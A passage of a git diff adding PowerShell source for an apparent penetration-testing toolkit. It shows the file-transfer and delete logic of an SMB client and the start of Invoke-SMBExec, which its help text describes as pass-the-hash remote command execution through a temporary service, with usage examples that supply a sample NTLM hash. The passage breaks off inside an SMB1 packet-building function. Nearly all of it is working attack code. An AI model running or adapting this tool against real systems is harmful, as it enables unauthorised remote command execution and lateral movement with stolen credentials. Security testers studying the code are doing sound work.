+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Length -Value $directory_contents_length_list[$i]
+
+ if($Modify)
+ {
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name CreateTime -Value $directory_contents_create_time_list[$i]
+ }
+
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name LastWriteTime -Value $directory_contents_last_write_time_list[$i]
+ $directory_contents_output += $directory_object
+ $i++
+ }
+
+ if($directory_contents_output -and !$Modify)
+ {
+
+ if($directory_contents_hide_headers)
+ {
+ ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; },
+ @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; },
+ @{ Name="Length"; Expression={$_.Length }; Alignment="right"; },
+ @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -HideTableHeaders -Wrap| Out-String).Trim()
+ }
+ else
+ {
+ $directory_contents_hide_headers = $true
+ ($directory_contents_output | Format-Table -Property @{ Name="Mode"; Expression={$_.Mode }; Alignment="left"; },
+ @{ Name="LastWriteTime"; Expression={$_.LastWriteTime }; Alignment="right"; },
+ @{ Name="Length"; Expression={$_.Length }; Alignment="right"; },
+ @{ Name="Name"; Expression={$_.Name }; Alignment="left"; } -AutoSize -Wrap| Out-String).Trim()
+ }
+
+ }
+ else
+ {
+ $directory_contents_output
+ }
+
+ $subdirectory_list.Reverse() > $null
+
+ ForEach($subdirectory in $subdirectory_list)
+ {
+ $directory_list.Insert(0,($root_directory + $subdirectory)) > $null
+ }
+
+ $SMB_offset = 0
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ 'FindRequest'
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2FindRequestFile $SMB_file_ID 0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2FindRequestFile $SMB_file_ID
+ $packet_SMB2b_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Get' -and $action_step -eq 1)
+ {
+ $find_response = [System.BitConverter]::ToString($SMB_client_receive)
+ $find_response = $find_response -replace "-",""
+ $file_unicode = [System.BitConverter]::ToString([System.Text.Encoding]::Unicode.GetBytes($source_file))
+ $file_unicode = $file_unicode -replace "-",""
+ $file_size_index = $find_response.IndexOf($file_unicode) - 128
+ $file_size = [System.BitConverter]::ToUInt32($SMB_client_receive[($file_size_index / 2)..($file_size_index / 2 + 7)],0)
+ $action_step++
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+
+ if($share_subdirectory -eq $file)
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($file)
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ }
+
+ }
+ else
+ {
+ $SMB_client_stage = 'ParseDirectoryContents'
+ }
+
+ }
+
+ 'CloseRequest'
+ {
+
+ if(!$SMB_file_ID)
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ }
+
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_file_ID = ''
+
+ if($directory_list.Count -gt 0 -and $Action -eq 'Recurse')
+ {
+ $SMB2_file = $directory_list[0]
+ $root_directory = $SMB2_file + 0x5c,0x00
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+
+ if($root_directory.Count -gt 2)
+ {
+ $root_directory_extract = [System.BitConverter]::ToString($root_directory)
+ $root_directory_extract = $root_directory_extract -replace "-00",""
+
+ if($root_directory.Length -gt 2)
+ {
+ $root_directory_extract = $root_directory_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $root_directory_string = New-Object System.String ($root_directory_extract,0,$root_directory_extract.Length)
+ }
+ else
+ {
+ $root_directory_string = [Char][System.Convert]::ToInt16($SMB2_file,16)
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Get' -and $action_step -eq 1)
+ {
+
+ if($share_subdirectory -eq $source_file)
+ {
+ $SMB2_file = ""
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,''))
+ }
+
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Delete')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+
+ if($share_subdirectory -eq $source_file)
+ {
+ $SMB2_file = ""
+ }
+ else
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory.Replace('\' + $source_file,''))
+ }
+
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ $action_step++
+
+ }
+
+ 1
+ {
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+
+ 3
+ {
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ }
+
+ }
+ elseif($share_subdirectory_start)
+ {
+ $share_subdirectory_start = $false
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ }
+
+ 'ReadRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x01,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $read_request_length $read_request_offset $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ Start-Sleep -m 5
+
+ if($read_request_length -eq 65536)
+ {
+ $i = 0
+
+ while($SMB_client.Available -lt 8192 -and $i -lt 10)
+ {
+ Start-Sleep -m $Sleep
+ $i++
+ }
+
+ }
+ else
+ {
+ Start-Sleep -m $Sleep
+ }
+
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Get' -and $action_step -eq 3)
+ {
+ $action_step++
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Get' -and $action_step -eq 7)
+ {
+
+ if(!$NoProgress)
+ {
+ $percent_complete_calculation = [Math]::Truncate($read_request_step / $percent_complete * 100)
+ Write-Progress -Activity "Downloading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation
+ }
+
+ $file_bytes = $SMB_client_receive[84..($read_request_length + 83)]
+
+ if(!$Modify)
+ {
+
+ if(!$file_write)
+ {
+ $file_write = New-Object 'System.IO.FileStream' $destination_path,'Append','Write','Read'
+ }
+
+ $file_write.Write($file_bytes,0,$file_bytes.Count)
+ }
+ else
+ {
+ $file_memory.AddRange($file_bytes)
+ }
+
+ if($read_request_step -lt $file_stream_size_quotient)
+ {
+ $read_request_offset+=65536
+ $read_request_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+ elseif($read_request_step -eq $file_stream_size_quotient -and $file_stream_size_remainder -ne 0)
+ {
+ $read_request_length = $file_stream_size_remainder
+ $read_request_offset+=65536
+ $read_request_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+ else
+ {
+
+ if(!$Modify)
+ {
+ $file_write.Close()
+ }
+ else
+ {
+ $file_memory.ToArray()
+ }
+
+ $output_message = "[+] File downloaded"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = 'CloseRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ 'WriteRequest'
+ {
+
+ if(!$Modify)
+ {
+ $source_file_binary_reader.BaseStream.Seek($write_request_offset,"Begin") > $null
+ $source_file_binary_reader.Read($source_file_buffer,0,$source_file_buffer_size) > $null
+ }
+ else
+ {
+ $source_file_buffer = $Source[$write_request_offset..($write_request_offset+$write_request_length)]
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x01,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $write_request_length $write_request_offset $SMB_file_ID $source_file_buffer
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($write_request_step -lt $source_file_size_quotient)
+ {
+
+ if(!$NoProgress)
+ {
+ $percent_complete_calculation = [Math]::Truncate($write_request_step / $percent_complete * 100)
+ Write-Progress -Activity "[*] Uploading $source_file - $progress_file_size" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation
+ }
+
+ $write_request_offset+=65536
+ $write_request_step++
+ $SMB_client_stage = 'WriteRequest'
+ }
+ elseif($write_request_step -eq $source_file_size_quotient -and $source_file_size_remainder -ne 0)
+ {
+ $write_request_length = $source_file_size_remainder
+ $write_request_offset+=65536
+ $write_request_step++
+ $SMB_client_stage = 'WriteRequest'
+ }
+ else
+ {
+ $action_step++
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x04
+ $set_info_request_buffer = $source_file_creation_time +
+ $source_file_last_access_time +
+ $source_file_last_write_time +
+ $source_file_last_change_time +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ if(!$Modify)
+ {
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ else
+ {
+ $output_message = "[+] File uploaded from memory"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($session_string -and !$Logoff)
+ {
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+ finally
+ {
+
+ if($file_write.Handle)
+ {
+ $file_write.Close()
+ }
+
+ if($source_file_stream.Handle)
+ {
+ $source_file_binary_reader.Close()
+ $source_file_stream.Close()
+ }
+
+ if($session_string -and $Inveigh)
+ {
+ $inveigh.session_lock_table[$session] = 'open'
+ $inveigh.session_message_ID_table[$session] = $SMB2_message_ID
+ $inveigh.session_list[$session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ }
+
+ if(!$session_string -or $Logoff)
+ {
+ $SMB_client.Close()
+ $SMB_client_stream.Close()
+ }
+
+ }
+
+}
+
+ if(!$Modify -or $Action -eq 'Put')
+ {
+ Write-Output $output_message
+ }
+ elseif($output_message)
+ {
+ Write-Verbose $output_message
+ }
+
+} \ No newline at end of file
diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1
new file mode 100644
index 0000000..7a4d868
--- /dev/null
+++ b/Invoke-SMBExec.ps1
@@ -0,0 +1,2777 @@
+function Invoke-SMBExec
+{
+<#
+.SYNOPSIS
+Invoke-SMBExec performs SMBExec style command execution with NTLMv2 pass the hash authentication. Invoke-SMBExec
+supports SMB1 and SMB2 with and without SMB signing.
+
+Author: Kevin Robertson (@kevin_robertson)
+License: BSD 3-Clause
+
+.PARAMETER Target
+Hostname or IP address of target.
+
+.PARAMETER Username
+Username to use for authentication.
+
+.PARAMETER Domain
+Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the
+username.
+
+.PARAMETER Hash
+NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
+
+.PARAMETER Command
+Command to execute on the target. If a command is not specified, the function will check to see if the username
+and hash provides local administrator access on the target.
+
+.PARAMETER CommandCOMSPEC
+Default = Enabled: Prepend %COMSPEC% /C to Command.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER SMB1
+(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
+target.
+
+.PARAMETER Sleep
+Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this
+setting if you are experiencing strange results.
+
+.PARAMETER Session
+Inveigh-Relay authenticated session.
+
+.PARAMETER SigningCheck
+(Switch) Checks to see if SMB signing is required on a target.
+
+.EXAMPLE
+Execute a command.
+Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
+
+.EXAMPLE
+Check command execution privilege.
+Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
+
+.EXAMPLE
+Execute a command using an authenticated Inveigh-Relay session.
+Invoke-SMBExec -Session 1 -Command "command or launcher to execute"
+
+.EXAMPLE
+Check if SMB signing is required.
+Invoke-SMBExec -Target 192.168.100.20 -SigningCheck
+
+.LINK
+https://github.com/Kevin-Robertson/Invoke-TheHash
+
+#>
+[CmdletBinding(DefaultParametersetName='Default')]
+param
+(
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Target,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$Command,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
+ [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SMB1,
+ [parameter(Mandatory=$false)][Int]$Sleep=150
+)
+
+if($Command)
+{
+ $SMB_execute = $true
+}
+
+if($SMB1)
+{
+ $SMB_version = 'SMB1'
+}
+
+function ConvertFrom-PacketOrderedDictionary
+{
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+}
+
+#NetBIOS
+
+function New-PacketNetBIOSSessionService
+{
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+}
+
+#SMB1
+
+function New-PacketSMBHeader
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+}
+
+function New-PacketSMBNegotiateProtocolRequest
+{
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+}
+
+function New-PacketSMBSessionSetupAndXRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_byte_count = $packet_byte_count[0,1]
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBSessionSetupAndXRequest.Add("WordCount",[Byte[]](0x0c))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxBuffer",[Byte[]](0xff,0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxMpxCount",[Byte[]](0x02,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("VCNumber",[Byte[]](0x01,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlobLength",$packet_byte_count)
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
+ $packet_SMBSessionSetupAndXRequest.Add("ByteCount",$packet_security_blob_length)
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlob",$packet_security_blob)
+ $packet_SMBSessionSetupAndXRequest.Add("NativeOS",[Byte[]](0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("NativeLANManage",[Byte[]](0x00,0x00))
+
+ return $packet_SMBSessionSetupAndXRequest
+}
+
+function New-PacketSMBTreeConnectAndXRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeConnectAndXRequest.Add("WordCount",[Byte[]](0x04))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBTreeConnectAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("PasswordLength",[Byte[]](0x01,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("ByteCount",$packet_path_length)
+ $packet_SMBTreeConnectAndXRequest.Add("Password",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Tree",$packet_path)
+ $packet_SMBTreeConnectAndXRequest.Add("Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
+
+ return $packet_SMBTreeConnectAndXRequest
+}
+
+function New-PacketSMBNTCreateAndXRequest
+{
+ param([Byte[]]$packet_named_pipe)
+
